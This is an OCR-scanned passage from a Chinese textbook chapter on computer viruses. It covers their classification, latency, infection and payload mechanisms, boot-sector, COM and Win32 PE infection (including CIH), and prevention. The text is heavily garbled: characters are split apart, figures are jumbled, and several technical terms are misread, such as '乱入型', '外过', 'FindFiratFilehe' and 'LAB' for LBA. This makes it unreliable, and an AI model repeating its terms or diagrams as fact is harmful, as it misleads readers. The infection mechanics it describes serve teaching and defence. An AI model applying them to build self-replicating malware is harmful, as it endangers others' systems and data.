类 病毒 的 程序 往往 会 减 慢 执行 速度 ,甚至 无 法 执行 。 

@ 文档 文件 或 数据 文件 ,例如 Word 文档 .Excel 文档 、Access 数据 库 文件 。 宏 病毒 
(Macro) 就 感染 这 些 文 件 。 

@ Web 文档 ,如 . html 文档 和 . htm 文档 。 已 经 发 现 的 Web 病毒 有 HTML/Prepend 
和 HTMIL/Redirect 等 。 

按照 驻 留 内 存 的 方式 ,文件 型 病毒 可 以 分 为 : 

@ 驻 留 (Resident) 病 毒 : 病毒 装 入 内 存 后 ,发 现 男 一 个 系统 运行 的 程序 文件 后 进行 传 
染 。 驻 留 病毒 又 可 进一步 分 为 高 端 驻 留 型 .常规 驻 留 型 .内 存 控 制 链 驻 留 型 .设备 程序 补丁 
驻 留 型 。 

@ 非 驻 留 (Nonresident) 病 毒 : 病毒 选择 磁盘 上 一 个 或 多 个 文件 ,不 等 它们 装 和 内存 ， 
就 直接 进行 感染 。 

(3) 目录 型 病毒 : 它 是 文件 型 病毒 的 一 种 特例 ,它们 仅 修 改 目录 区 ,如 DIR2 病毒 。 

(4) 引导 兼 文件 型 病毒 : 这 类 病毒 在 文件 感染 时 还 伺机 感染 引导 区 ,例如 CANCER 病 
毒 .HAMMER V 病毒 等 。 

(5) CMOS 病毒 : CMOS 是 保存 系统 参数 和 配置 的 重要 地 方 , 它 也 存在 一 些 没 有 使 用 
的 空间 。CMOS 病毒 就 隐藏 在 这 一 空间 中 ,从 而 可 以 躲避 磁盘 的 格式 化 清除 。 
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3. 按照 传播 媒介 分 类 


(1) 单机 病毒 : 以 磁盘 为 传染 媒介 。 
(2) 网 络 病毒 : 以 网 络 中 传输 的 命令 或 数据 作为 媒介 。 


4. 按照 计算 机 病毒 的 链接 方式 分 类 


(1) 源码 型 病毒 : 攻击 高 级 语言 编写 的 程序 ,在 被 攻击 程序 编译 前 插入 进来 ,并 在 编译 
后 成 为 合法 程序 的 一 部 分 。 

(2) 乱入 型 病毒 : 计算 机 病毒 的 主体 与 被 攻击 对 象 以 插入 方式 链接 ,把 自己 能 入 到 攻 
击 对 象 中 。 这 类 病毒 程序 编写 难度 大 ,清除 也 难 。 

(3) 外 过 (shell) 型 病毒 : 这 类 病毒 通常 附加 在 正常 程序 的 头 部 或 尾部 ,相当 于 给 程序 
添加 了 一 个 外 过 ,在 被 感染 的 程序 执行 时 ,病毒 代码 先 被 执行 ,然后 才 将 正常 程序 调 入 内 存 。 
目前 大 多 数 文件 型 的 病毒 属于 这 一 类 。 

(4) 译 码 型 病毒 : 隐藏 在 微软 的 Office、AmiPro 文档 中 ,如 宏 病毒 .脚本 病毒 (VBS/ 
WSH/JS) 等 。 

(5) 操作 系统 型 病毒 : 这 类 病毒 意图 用 自己 的 代码 加 入 或 取代 操作 系统 的 某 些 模块 ， 
具有 很 强 的 破坏 性 ,例如 小 球 病毒 、 大 麻 病 毒 等 。 


5. 按照 破坏 能 力 分 类 


按照 病毒 的 破坏 能 力 ,可 将 病毒 划分 为 以 下 几 类 

(1) 无 害 型 : 除了 传染 时 减少 磁盘 的 可 用 空间 外 ,对 系统 没有 其 他 影响 。 

(2) 无 危险 型 : 这 类 病毒 仅仅 是 减少 内 存 .显示 图 像 .发 出 声音 及 同类 音响 。 

(3) 危险 型 : 这 类 病毒 在 计算 机 系统 操作 中 造成 严重 的 错误 。 

(4) 非常 危险 型 : 这 类 病毒 删除 程序 .破坏 数据 、 清 除 系统 内 存 区 和 操作 系统 中 重要 的 
信息 。 


4.1.3 计算 机 病毒 的 基本 机 制 

计算 机 病毒 形形色色 ,结构 各 异 ,但 是 通常 都 包含 了 潜伏 、 传 染 和 表现 3 种 机 制 。 

1. 潜伏 

潜伏 机 制 的 主要 作用 是 进行 病毒 的 引导 、 隐 藏 和 捕捉 。 

(1) 引导 

计算 机 病毒 为 了 进行 破坏 ,多 数 驻 留 内 存 。 引 导 就 是 将 病毒 的 主体 加 载 到 内 存 。 一 般 
来 说 ,引导 过 程 由 3 步 组 成 

@ 驻 留 内 存 一 一 自身 的 程序 代码 引入 并 驻 留 在 内 存 中 。 

@ 窃取 控制 权 一 一 取代 或 扩充 系统 原 有 功能 ,并 窃取 系统 的 控制 权 。 为 传染 部 分 作 准 
备 ( 如 驻 留 内 存 、 修 改 中 断 、 修 改 高 端 内 存 、 保 存 原 中 断 向 量 等 操作 ) 。 

@ 恢复 系统 功能 一 一 引导 过 程 完成 之 后 ,病毒 为 了 隐藏 自己 ,并 等 待 时 机 进行 传染 和 
破坏 ,还 要 把 控制 权 交 还 给 系统 。 
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(2) 隐藏 

利用 各 种 可 能 的 隐藏 方式 ,躲避 各 种 检测 ,欺骗 系统 ,将 自己 隐蔽 起 来 。 

(3) 捕捉 (也 称 搜索 ) 

就 是 不 停 地 捕捉 感染 目标 交 给 传染 模块 ,同时 不 停 地 捕捉 触发 条 件 交 给 表现 模块 。 


2. 传染 


传染 机 制 的 作用 是 在 特定 的 感染 条 件 下 ,将 病毒 代码 复制 到 传染 目标 。 所 以 这 个 机 制 
由 激活 传染 条 件 的 判断 部 分 和 传染 功能 的 实施 部 分 实现 。 


3. 表现 


表现 机 制 的 作用 是 在 被 传染 系统 上 表现 出 特定 现象 ,主要 是 产生 破坏 被 传染 系统 的 行 
为 。 大 部 分 病毒 都 是 在 一 定 条 件 下 才 会 被 触发 而 发 作 表现 。 
计算 机 病毒 程序 工作 的 N-S 图 如 图 4. 1 所 示 。 


将 病毒 程序 寄生 到 宿主 程序 中 
加 载 计算 机 程序 

含有 病毒 的 宿主 程序 进入 计算 机 系统 
寻找 传染 对 象 

满足 传染 条 件 

调用 传染 功能 模块 


由 
过 


当 满 足 破坏 条 件 时 
激活 病毒 程序 
调用 破坏 功能 模块 
运行 宿主 源 程序 


Y 是 否 关 机 N 


停机 Goto A 


图 4.1 计算 机 病毒 程序 工作 的 N-S 图 


4.1.4 典型 计算 机 病毒 分 析 


1. DOS 引导 型 病毒 分 析 


(1) 主 引 导 记 区 
DOS 引导 型 病毒 是 隐藏 在 磁盘 主 引 导 扇 区 (boot sector) 的 病毒 。 主 引导 扇 区 位 于 硬盘 
的 0 柱 面 0 磁道 1 扇 区 ,其 结构 如 图 4. 2 所 示 , 用 于 存放 主 引 导 记 录 (main boot record， 
MBR) .硬盘 主 分 区 表 (disk partition table, DPT) 和 引导 扇 区 标记 (boot record ID) 。 
O@ 主 引导 记录 (MBR) 占 用 引导 扇 区 的 前 446 个 字 节 (0000~~01BD), 作 用 是 检查 分 区 
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“| 主 引导 记录 启动 程序 
008A i > 
主 引导 记录 MBR 

, 启动 字符 (6 字 ) 
00D9 
00DA 保留 
01BD 
O01BE i 二 ~ 
olcp 分 区 信息 1(16 字 节 ) 

pr 
oIpp 分 区 信息 2(16 字 节 ) ee 
0 分 区 信息 3(16 字 节 ) 
QD | 分 区 信息 4(16 字 节 ) 
8 中 [55Q 字 节 )|AAQ 字 节 ) 上 一 引导 扇 区 标记 


图 4.2 主 引导 扇 区 的 结构 


表 是 否 正确 以 及 确定 哪个 分 区 为 引导 分 区 (要 将 控制 权 交 给 操作 系统 所 在 分 区 ) ,并 在 程序 
结束 时 把 该 分 区 的 启动 程序 ( 即 操作 系统 引导 程序 ) 调 入 内 存 加 以 执行 。 

在 DOS 的 启动 过 程 中 ,中 断 服务 程序 INT 19H( 自 举 程序 ) 将 引导 记录 调和 内存 的 
0000H: 7C00H 处 ,并 把 控制 权 交 给 它 。 这 时 ,引导 记录 将 检查 启动 盘 上 是 否 有 DOS 系统 ， 
即 根 目录 中 的 前 两 个 文件 是 否 为 IO. SYS 和 MSDOS. SYS。 若 是 , 则 把 文件 IO. SYS 读 人 
到 内 存 的 70H: 0H 处 ,并 把 主 控制 权 交 给 IO. SYS ,否则 给 出 非 系 统 盘 的 错误 信息 。 

@ 磁盘 主 分 区 表 (DPT) 中 记录 了 磁盘 的 基本 分 区 信息 。 它 占用 的 64 字 节 分 为 4 个 分 
区 项 ,分 别 记录 了 每 个 主 分 区 的 信息 。 

@ 引导 区 标记 一 一 55AA, 占 用 两 个 字 节 ,用 于 判断 引导 区 是 否 合法 。 

(2) DOS 的 自 举 过 程 

图 4.3 为 DOS 的 自 举 过 程 。 可 以 看 出 ,在 这 个 自 举 过 程 中 ,系统 的 控制 权 按 照 下 面 的 


系统 加 电 或 复位 


系统 自 检 
否 
后 盘 驱 动 器 中 有 磁 芝 成 功 ? 
是 是 
1 1 
读 主 引 导 程序 系统 初始 化 
到 0000:7C00H 
并 执行 | 
读 
1 COMMAND.COM 
读 IO.SYS 和 到 内 存 
MSDOS.SYS 到 内 存 
70:00 处 
1 1 
提示 “插入 磁盘 ” 人。 自 举 完成 。 ) 《显示 “ 非 系统 盘 ”) 


图 4.3 DOS 的 自 举 过 程 
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顺序 转移 : 

ROMBIOS->DOS 引导 程序 IO. SYS-~~>MSDOS. SYS~~COMMAND. COM-~> 用 户 。 

主 引导 程序 的 基本 功能 是 读 出 自 举 分 区 的 BOOT 程序 ,并 把 控制 权 转移 到 分 区 BOOT 
程序 。 在 这 一 过 程 中 ,关键 性 的 技术 有 : 

QO 将 本 来 要 读 和 到 0000: 7C00H 处 的 硬盘 主 引导 程序 转移 到 0000: 0600H 处 。 

@ 顺序 读 入 4 个 分 区 表 的 自 举 标志 ,以 找 出 自 举 分 区 : 若 找 不 到 ,就 转向 执行 INT 
18H 的 BOOT 异常 ,执行 异常 中 断 程序 。 

@ 找到 自 举 分 区 后 ,检测 该 分 区 标志 : 如 果 是 32 位 /16 位 FAT 并 支持 13 号 中 断 的 扩 
展 功能 ,就 转向 执行 13 号 中 断 的 41 号 功能 调用 ,进行 安装 检测 。 检 测 成 功 , 就 执行 42 号 扩 
展 功能 调用 ,把 BOOT 程序 读 人 内 存 0000: 7C00H 处 。 读 入 成 功 ,就 执行 0000: 7C00H 处 
的 程序 ; 读 入 失败 ,就 调用 13 号 中 断 的 读 扇 区 功能 ,把 BOOT 程序 读 入 内 存 0000: 
7C00H 处 。 

(3) 引导 型 病毒 的 传染 过 程 

图 4. 4 为 带 有 病毒 的 DOS 自 举 (图 4.4(b)) 与 正常 DOS 自 举 (图 4.4(a), 是 图 4.4 的 
简化 ) 的 对 比 。 


系统 加 电 或 复位 系统 加 电 或 复位 


进入 ROM-BIOS bb 
' 
读 引导 至 引导 至 0000:7C00H 引导 区 病毒 
0000:7C00H 并 执行 并 执行 并 执行 病毒 程序 
i i 1 
系统 复位 系统 复位 修改 中 断 向 量 
| | 
读 COMMAND.COM 读 COMMAND.COM 复制 病毒 /感染 磁盘 
到 内 存 到 内 存 
(a) 正常 DOS 自 举 (b) 带 病毒 DOS 自 举 


图 4.4 引导 型 病毒 的 一 次 活动 过 程 


引导 型 病毒 是 驻 留 在 硬盘 的 主 引导 分 区 或 硬 /软盘 的 DOS 引导 分 区 的 病毒 , 它 的 感染 
过 程 分 两 大 步 : 装 入 内存 和 攻击 。 
装 和 内存 过 程 如 下 : 
@ 系统 开机 后 ,进入 系统 检测 ,检测 正常 后 ,从 0 面 0 道 1 扇 区 , 即 逻 辑 0 扇 区 读 取信 
息 到 内 存 的 0000: 7C00H 处 : 
"正常 时 ,磁盘 0 面 0 道 1 扇 区 , 即 逻 辑 0 扇 区 存放 的 是 boot 引导 程序 。 
。 操作 系统 感染 了 引导 扇 区 病毒 时 ,磁盘 0 面 0 道 1 扇 区 , 即 逻辑 0 扇 区 存放 的 是 病 
毒 引 导 部 分 ,boot 引导 程序 被 放 到 其 他 地 方 。 例 如 ,大麻 病 毒 在 软盘 中 将 原 DOS 引 
导 扇 区 搬移 到 0 道 1 面 3 扇 区 ,在 硬盘 中 将 原 DOS 引导 扇 区 搬移 到 0 道 0 面 7 扇 
= 了 3 汉 


区 ;香港 病毒 则 将 原 DOS 引导 扇 区 搬移 到 39 磁道 第 8 扁 区 ;Michelangelo 病毒 在 
高 密度 软盘 上 是 第 27 扇 区 ,在 硬盘 上 是 0 道 0 面 7 扇 区 。 

@ 系统 开始 运行 病毒 引导 部 分 ,将 病毒 的 其 他 部 分 读 入 到 内 存 的 某 一 安全 区 , 常 驻 内 
存 ,监视 系统 的 运行 。 

@ 病毒 修改 INT 13H 中 断 服务 处 理 程 序 的 入 口 地 址 ,使 之 指向 病毒 控制 模块 并 执行 ， 
以 便 必要 时 接管 磁盘 操作 的 控制 权 。 

BIOS INT 13H 调用 是 BIOS 提供 的 磁盘 基本 输入 输出 中 断 调用 ,可 以 完成 磁盘 (包括 
硬盘 和 软盘 ) 的 复位 、 读 写 、 校 验 、 定 位 诊断、 格式 化 等 操作 。 它 采用 CHS 寻 址 ( 按 柱 面 、 磁 
道 . 扇 区 3 个 参数 寻 址 , 即 旧 的 寻 址 方式 。 新 的 寻 址 方式 是 LAB 一 一 线性 寻 址 ) ,最 大 访问 
能 力 为 8GB 左右 。 

@ 病毒 程序 全 部 读 人 后 ,接着 读 入 正常 boot 内 容 到 内 存 0000: 7C00H 处 ,进行 正常 的 
启动 过 程 ( 这 时 病毒 程序 已 经 全 部 读 和 内存 ,不 再 需要 病毒 的 引导 部 分 ) 。 

@ 病毒 程序 伺机 等 待 随 时 感染 新 的 系统 盘 或 非 系统 盘 。 

攻击 过 程 如 下 : 

病毒 程序 发 现 有 可 攻击 的 对 象 后 .要 进行 下 列 工作 : 

@ 将 目标 盘 的 引导 遍 区 读 人 内存 ,判断 它 是否 感 染 了 病毒 。 

@ 满足 感 当 条件 时 ,将 病毒 的 全 部 或 一 部 分 写 人 boot 区 ,把 正常 的 磁盘 引导 区 程序 写 
入 磁盘 特定 位 置 。 

@ 返回 正常 的 INT 13H 中 断 服务 处 理 程 序 ,完成 对 目标 盘 的 传染 过 程 。 


2. COM 文件 型 病毒 分 析 


COM 型 文件 病毒 是 寄生 于 COM 文件 的 病毒 。 为 了 说 明 COM 型 病毒 的 原理 ,需要 了 

解 如 下 的 问题 : 
。 COM 型 文件 是 如 何 执 行 的 ; 
。 COM 型 病毒 是 如 何 寄生 在 COM 型 文件 中 的 ; 
。 COM 型 文件 病毒 是 如 何 执行 的 。 

(1) COM 文件 的 加 载 与 内 存 结构 

COM 型 文件 可 以 由 CPU 直接 执行 。 执 行 的 过 程 如 下 : 当 用 户 在 DOS 命令 行 中 输入 
程序 名 后 ,DOS 就 开始 寻找 扩展 名 为 . COM 的 同名 程序 。 找 到 了 ,就 把 系统 的 控制 权 交 给 
该 程序 ,并 开始 执行 该 程序 。 

但 是 ,DOS 要 执行 一 个 COM 文件 ,必须 先 作 一 些 准备 工作 ,首先 要 为 程序 分 配 运行 所 
需要 的 内 存 ,然后 进行 COM 文件 加 载 。 图 4. 5 中 有 灰 底 的 部 分 是 为 COM 分 配 的 内 存 情 
况 。 其 中 ,堆栈 用 于 该 COM 程序 中 动态 数据 的 存储 ,COM 文件 映像 是 该 COM 文件 在 内 
存 的 一 个 绝对 映像 ,复制 COM 文件 映像 的 过 程 称 为 加 载 COM 程序 。 这 样 ,COM 文件 才 
能 在 DOS 外 壳 上 直接 运行 处 理 器 指令 和 内 存 数据 。 

COM 文件 是 一 种 单 段 执行 结构 , 它 被 分 配 在 一 个 64K 字 节 的 空间 中 。 这 个 空间 中 除 
了 要 存放 COM 文件 外 ,还 要 存放 一 个 程序 段 前 级 (program segment prefix, PSP) 和 一 个 起 
始 堆栈 。PSP 区 的 大 小 为 256 字 节 ,包括 了 当前 加 载 的 文件 在 执行 时 所 需要 的 参数 以 及 在 
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一 


= 可 半 术 纤 


堆栈 区 
程序 剩余 空间 


SP:FFFEH 


RAM 最 高 端 一 一 
图 4.5 COM 文件 内 存 映像 图 


COM 文件 执行 结束 退出 时 的 环境 参数 ,作为 程序 与 DOS 的 接口 被 DOS 用 来 管理 进程 。 

为 了 运行 COM 文件 ,还 要 为 它 设置 多 个 内 部 寄存 器 的 初 值 一 一 使 4 个 段 寄存 器 CS、 
ES、PS、SS 均 指向 PSP 十 0H ;使 指令 寄存 器 IP 指向 PSP 十 100H 一 一 COM 文件 的 第 1 条 指 
令 处 。 

(2) COM 型 文件 病毒 机 制 

一 个 COM 型 文件 病毒 要 进行 传染 或 破坏 ,就 要 在 其 所 寄生 的 COM 文件 执行 的 某 个 点 
上 获得 控制 权 ,执行 结束 后 再 把 控制 权 交 给 宿主 程序 。 为 此 ,需要 解决 如 下 两 个 问题 : 病毒 
在 什么 时 机 取得 控制 权 最 好 以 及 病毒 用 什么 方法 取得 控制 权 。 

Qa 病毒 取得 控制 权 的 时 机 

一 般 来 说 , 当 由 DOS 用 Jump 指令 跳 到 COM 程序 的 起 点 时 ,是 一 个 比较 合适 的 时 机 。 因 
为 这 时 COM 程序 还 没有 执行 ,病毒 的 运行 也 不 会 干扰 宿主 程序 的 运行 ,便于 病毒 自己 的 隐蔽 
和 安全 。 同 时 ,系统 为 COM 程序 分 配 的 内 存 空间 还 空闲 着 ,病毒 可 以 自由 地 使 用 这 些 空间 。 

@ 病毒 取得 控制 权 的 方法 

病毒 取得 控制 权 的 基本 方法 是 : 

。 把 被 感染 的 COM 文件 的 最 开始 (100H 偏 移 处 ) 几 个 字 节 换 成 跳 转 到 病毒 代码 的 

Jump 指令 ; 
。 用 Jump 指令 将 流程 转 到 病毒 代码 ,完成 感染 和 破坏 过 程 ; 
。 病毒 代码 执行 结束 ,要 先 恢复 被 替换 的 几 个 字 节 ,再 跳 回 到 100H 偏 移 处 ,执行 宿主 
程序 。 

(3) 已 感染 病毒 的 COM 型 程序 的 大 致 执行 过 程 

Qa 被 感染 的 COM 文件 被 加 载 到 内 存 。 

@ 系统 将 控制 权 交 到 100H 偏 移 处 。 

@ 执行 100H 偏 移 处 的 跳 转 指令 ,开始 执行 病毒 代码 。 

@ 内 存 中 的 病毒 代码 开始 搜索 磁盘 ,寻找 合适 的 感染 目标 。 

@ 找到 合适 的 感染 目标 ,将 病毒 自身 复制 到 目标 的 尾部 。 将 该 目标 COM 文件 最 开始 
几 个 字 节 读 到 内 存 , 保 存 到 病毒 码 所 在 的 某 数据 区 。 写 一 条 转向 该 文件 尾部 的 病毒 代码 的 
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Jump 指令 ,以 便 该 COM 文件 被 执行 时 通过 它 把 控制 权 交 给 病毒 代码 。 
病毒 把 COM 文件 的 最 初 几 个 字 节 写 回 到 原来 的 100H 偏 移 处 。 
@ 病毒 代码 执行 一 条 跳 转 到 100H 偏 移 处 的 Jump 指令 ,开始 执行 宿主 程序 。 


3. Win 32 PE 病毒 分 析 


(1) Win 32 PE 文件 格式 
Win 32 PE 文件 就 是 Win 32(Windows 95/98/2000/XP) 环 境 下 的 PE 格式 (portable 
executable format) 的 可 执行 文件 。 为 了 了 解 


病毒 对 它 的 感染 机 理 ,首先 介绍 PE 文件 的 结 | 
构 和 运行 机 制 。PE 文件 的 格式 如 图 4. 6 COFF 符 号 表 符号 个 数 (可 选 ) 
所 示 。 代码 调试 信息 (可 选 ) 
Q@ MZ 头 : 所 有 的 PE 文件 必须 以 一 个 “ 段 

具有 重 定位 功能 的 可 执行 文件 格式 DOS MZ ee 
(MZ 格式 的 主要 作者 Mark Zbikowski 的 名 jedata 段 
字 的 缩写 ) 头 开始 。MZ 头 中 包括 各 种 说 明 数 和 
据 , 如 第 一 句 可 执行 代码 执行 指令 时 所 需要 :text 段 
的 文件 入 口 点 、 堆 栈 的 位 置 、 重 定位 表 等 , 操 段 表 
作 系统 根据 文件 头 的 信息 将 代码 部 分 装 入 内 Ek 
存 , 然 后 根据 重 定位 表 修 正 代 码 , 最 后 在 设置 NT 关 文件 丈 be 
好 堆栈 后 从 文件 头 中 指定 的 入口 开始 执行 。 PE\OW PE 文件 标志 
所 以 DOS 可 以 把 程序 放 在 任何 它 想 要 的 地 DOS stub 
方 。 图 4.7 是 MZ 格式 的 可 执行 文件 的 简单 se 大 镶 
结构 示意 图 。 图 4.6 Windows PE 文件 格式 

MZ 标志 

其 他 信息 MZ 文件 头 

重 定位 表 的 字 节 偏 移 量 
重 定位 表 重 定 位 表 
可 重 定位 程序 映像 二 进 制 代 码 


图 4.7 MZ 格式 的 可 执行 文件 的 简单 结构 


@ DOS stub: DOS stub 是 一 个 极 小 ( 几 百 个 字 节 ) 的 DOS 程序 ,用 于 输出 警告 ,如 “该 
程序 不 能 在 DOS 模式 下 运行 "等 。 当 Win 32 把 一 个 PE 文件 映像 加 载 到 内 存 时 ,内 存 映 像 
文件 的 第 一 个 字 节 对 应 到 DOS stub 的 第 一 个 字 节 。 

@ PE 头 : PE 头 长 度 为 1024 字 节 ,是 PE 文件 的 标志 。 执 行 体 在 支持 PE 文件 的 操作 
系统 中 执行 时 ,PE 装载 器 将 从 DOS MZ 头 中 找到 PE 头 的 偏 移 量 。 

@ PE 文件 的 内 容 部 分 由 一 些 称 为 段 的 块 组 成 。 每 段 是 一 块 具有 共同 属性 的 数据 。 段 
数 写 在 段 表 中 。 
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(2) PE 文件 的 装载 过 程 

@ PE 文件 被 执行 时 ,PE 装载 器 检查 DOS MZ 头 中 的 PE 头 偏 移 量 ,如 果 找 到 了 ,就 跳 
转 到 PE 头 。 

@ PE 检查 器 检查 PE 头 的 有 效 性 。 如 果 有 效 ,就 跳 转 到 PE 头 的 尾部 。 

@ 读 取 段 表 中 的 信息 ,通过 文件 映射 ,将 段 映 射 到 内 存 , 同 时 附 上 段 表 中 指定 的 段 的 
属性 。 

@ PE 文件 映射 到 内 存 后 ,PE 装载 器 处 理 PE 文件 中 的 有 关 逻 辑 。 

(3) Win 32 PE 病毒 原理 

@ 重 定位 : 定位 主要 指 程序 中 数据 的 内 存 存储 位 置 。 对 于 正常 的 程序 来 说 ,数据 的 内 
存 存储 位 置 在 编译 时 就 已 经 计算 好 了 ,程序 装 入 内 存 时 不 需要 对 它们 重 定位 。 而 计算 机 病 
毒 可 能 依附 在 宿主 程序 的 不 同位 置 , 当 病毒 随 着 宿主 程序 装载 到 内 存 后 ,病毒 中 数据 的 位 置 
也 会 随 之 发 生变 化 。 由 于 指令 是 通过 地 址 引用 数据 的 ,地 址 的 不 准确 将 导致 病毒 程序 的 不 
正确 执行 。 为 此 ,有 必要 对 病毒 代码 中 的 数据 进行 重 定 位 。 

@ 获取 API 函数 地 址 : 在 Win 32 环境 中 ,系统 功能 调用 不 是 通过 中 断 实现 ,而 是 通过 
调用 API 函数 实现 。 因 此 ,获取 API 函数 的 入口 地 址 非常 重要 。 但 是 ,Win 32 PE 病毒 与 
普通 的 Win 32 PE 程序 不 同 : 普通 的 Win 32 PE 程序 里 有 一 个 引入 函数 节 ,程序 通过 这 个 
节 可 以 找到 代码 段 中 所 用 的 API 函数 在 动态 链接 库 中 的 真实 地 址 。 调 用 API 函数 时 ,可 以 
通过 该 引入 函数 表 找 到 相应 API 函数 的 真正 执行 地 址 。 

但 是 ,Win 32 PE 病毒 只 有 一 个 代码 段 , 并 不 存在 引入 函数 节 , 因 此 不 能 直接 用 真实 地 
址 调用 API 函数 。 所 以 获取 API 地 址 是 病毒 的 一 个 重要 技术 。 

@ 搜索 目标 文件 : 通常 通过 两 个 API 函数 FindFiratFilehe 和 FindNextFile 实现 。 

@ 内 存 文件 映射 : 使 用 内 存 文件 映射 进行 文件 读 写 。 

@ 感染 其 他 文件 。 

@ 返回 到 宿主 程序 。 

(4) Win 32 PE 病毒 实例 一 一 CIH 病毒 

CIH 病毒 以 Win 32 PE 文件 为 攻击 对 象 。 它 开创 了 直接 攻击 、 破 坏 硬件 的 先例 ,发 作 
时 破坏 Flash BIOS 芯片 中 的 系统 程序 ,导致 主板 损坏 ,造成 部 分 厂家 的 主板 开机 后 无 反应 。 
同时 ,使 硬盘 驱动 器 不 停 地 转动 ,病毒 以 2048 个 扇 区 为 单位 ,从 硬盘 主 引 导 区 开始 依次 往 硬 
盘 中 写 人 垃圾 数据 ,直到 硬盘 中 的 全 部 数据 被 破坏 。 


4.1.5 计算 机 病毒 防治 


狭义 的 计算 机 病毒 对 抗 是 指 通过 建立 合理 的 计算 机 病毒 防范 体系 和 制度 ,及 时 发 现 计 
算 机 病毒 侵入 ,并 采取 有 效 的 手段 阻止 计算 机 病毒 的 传播 和 破坏 ,恢复 受 影响 的 计算 机 系统 
和 数据 。 广 义 的 计算 机 病毒 对 抗 还 涉及 使 用 病毒 作为 武器 的 相互 攻击 和 防御 。 本 书 仅仅 讨 
论 狭 义 的 计算 机 病毒 对 抗 ,简单 地 说 ,就 是 查 、 防 、 除 ` 复 (恢复 )4 大 方面 。 


1. 计算 机 病毒 的 预防 


计算 机 病毒 防治 要 采取 预防 为 主 的 方针 。 下 面 是 一 些 行 之 有 效 的 措施 。 
(1) 对 新 购置 的 计算 机 硬 软件 系统 进行 测试 。 
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(2) 单 台 计算 机 系统 的 安全 使 用 
。 在 一 台 计 算 机 中 使 用 在 其 他 计算 机 中 用 过 的 移动 存储 器 时 ,应 当先 进行 病毒 检测 。 
。 对 重点 保护 的 计算 机 系统 应 做 到 专机 、 专 盘 、 专 人 ,专用 。 
。 封闭 的 使 用 环境 中 是 不 会 自然 产生 计算 机 病毒 的 。 
(3) 计算 机 网 络 的 安全 使 用 
对 于 网 络 计算 机 系统 ,除了 首先 保证 自己 使 用 的 计算 机 的 安全 外 ,还 应 采取 下 列 针对 网 
络 的 防 杀 计算 机 病毒 措施 : 
。 安装 网 络 服务 器 时 ,应 保证 安装 环境 和 网 络 操作 系统 本 身 没有 感染 计算 机 病毒 。 
。 安装 网 络 服务 器 时 ,应 将 文件 系统 划分 成 多 个 文件 卷 系统 。 一 旦 系统 卷 受到 某 种 损 
伤 ,导致 服务 器 瘫痪 ,就 可 以 通过 重 装 系统 卷 ,恢复 网 络 操 作 系 统 ,使 服务 器 又 马上 
投入 运行 ,而 装 在 共享 的 应 用 程序 卷 和 用 户 卷 内 的 程序 和 数据 文件 不 会 受到 任何 损 
伤 。 如 果 用 户 卷 内 由 于 计算 机 病毒 或 使 用 上 的 原因 导致 存储 空间 拥塞 时 ,系统 卷 不 
会 受 影响 ,不 会 导致 网 络 系统 运行 失常 。 这 种 划分 还 十 分 有 利于 系统 管理 员 设 置 网 
络 安全 存 取 权 限 ,保证 网 络 系统 不 受 计算 机 病毒 感染 和 破坏 。 
。 要 用 硬盘 启动 网 络 服务 器 ,和 否则 在 受到 引导 型 计算 机 病毒 感染 和 破坏 后 ,遭受 损失 
的 将 不 仅仅 是 一 台 个 人 计算 机 ,而 会 影响 到 整个 网 络 的 中 枢 。 
。 在 网 络 服务 器 上 必须 安装 真正 有 效 的 防 杀 计算 机 病毒 软件 ,并 经 常 进行 升级 。 必 要 
时 还 可 以 在 网 关 、 路 由 器 上 安装 计算 机 病毒 防火 墙 产品 ,从 网 络 出 入 口 保护 整个 网 
络 不 受 计算 机 病毒 的 侵害 。 
。 不 随便 直接 运行 或 直接 打开 电子 函件 中 夹带 的 附件 文件 ,不 随意 下 载 软件 ,尤其 是 
一 些 可 执行 文件 和 Office 文档 。 即 使 下 载 了 ,也 要 先 用 最 新 的 防 杀 计算 机 病毒 软件 
检查 。 
(4) 重要 数据 文件 要 有 备份 
。 硬盘 分 区 表 .引导 扇 区 等 的 关键 数据 应 作 备份 并 妥善 保管 ,以 便 在 进行 系统 维护 和 
修复 工作 时 作为 参考 。 
。 重要 数据 文件 定期 进行 备份 工作 。 不 要 等 到 由 于 计算 机 病毒 破坏 .计算 机 硬件 或 软 
件 出 现 故障 ,使 用 户 数 据 受到 损伤 时 再 去 急救 。 
(5) 强化 安全 管理 
。 系统 管理 员 的 口令 应 严格 管理 .不 使 之 泄漏 .不 定期 地 予以 更 换 , 保 护 网 络 系统 不 被 
非法 存 取 ,不 被 感染 上 计算 机 病毒 或 遭受 破坏 。 
应 用 程序 软件 的 安装 应 由 系统 管理 员 进 行 或 由 系统 管理 员 临时 授权 进行 ,保护 网 络 
用 户 使 用 共享 资源 时 总 是 安全 无 病毒 的 。 
。 系统 管理 员 对 网 络 内 的 共享 电子 函件 系统 .共享 存储 区 域 和 用 户 卷 应 定期 进行 计算 
机 病毒 扫描 ,发 现 异 常情 况 及 时 处 理 。 条 件 许 可 ,还 应 在 应 用 程序 卷 中 安装 最 新 版 
本 的 防 杀 计算 机 病毒 软件 供用 户 使 用 。 
。 网 络 系统 管理 员 应 做 好 日 常 管理 事务 的 同时 ,还 要 拟订 应 急 措 施 ,及 时 发 现 计算 机 
病毒 感染 迹象 。 一旦 出 现 计算 机 病毒 传播 迹象 ,应 立即 隔离 被 感染 的 计算 机 系统 和 
网 络 , 并 进行 处 理 。 不 应 当 带 病毒 继续 工作 ,要 按照 特别 情况 清查 整个 网 络 , 切 断 计 
算 机 病毒 传播 的 途径 ,保障 正常 工作 的 进行 。 
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(6) 防范 体系 与 规范 建设 

计算 机 病毒 防范 工作 ,首先 是 防范 体系 的 建设 和 制度 的 建立 。 没 有 一 个 完善 的 防范 体 
系 ,一切 防范 措施 都 将 滞后 于 计算 机 病毒 的 危害 。 

计算 机 病毒 防范 制度 是 防范 体系 中 每 个 主体 都 必需 的 行为 规程 ,没有 制度 ,防范 体系 就 
不 可 能 很 好 地 运作 ,就 不 可 能 达到 预期 的 效果 。 必 须 依 照 防范 体系 对 防范 制度 的 要 求 ,结合 
实际 情况 建立 符合 自身 特点 的 防范 制度 。 

为 了 统筹 全 国 的 计算 机 病毒 的 防治 ,2000 年 5 月 在 原 * 计 算 机 病毒 检测 防治 产品 检测 
中 心 ” 的 基础 上 ,成 立 了 “国家 计算 机 病毒 应 急 处 理 中 心 ”。 国 家 计算 机 病毒 应 急 处 理 中 心 的 
工作 任务 是 : 充分 调动 国内 防治 计算 机 病毒 的 力量 ,快速 发 现 病毒 疫情 ,快速 作出 反应 , 快 
